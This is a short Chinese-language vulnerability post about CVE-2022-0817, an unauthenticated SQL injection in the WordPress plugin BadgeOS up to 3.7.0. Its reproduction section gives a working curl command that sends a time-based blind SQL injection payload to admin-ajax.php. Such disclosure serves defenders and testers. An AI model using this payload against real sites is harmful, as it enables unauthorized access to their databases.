WordPress插件BadgeOS <= 3.7.0未经身份验证的 SQLi注入漏洞CVE-2022-0817

漏洞描述

插件不会在通过 AJAX 操作在 SQL 语句中使用参数之前对其进行清理和转义,从而导致未经身份验证的用户可以利用 SQL 注入
 


 

影响插件

badgeos <= 3.7.0
 


 

漏洞复现

curl 'https://example.com/wp-admin/admin-ajax.php' --data 'action=get-achievements&total_only=true&user_id=11 AND (SELECT 9628 FROM (SELECT(SLEEP(5)))WOrh)-- KUsb'

图片[1]-WordPress插件BadgeOS <= 3.7.0未经身份验证的 SQLi注入漏洞CVE-2022-0817-孤勇者社区
 

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞6赞赏 分享
评论 共2条
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片
    • 头像卡市0
    • 头像的拟0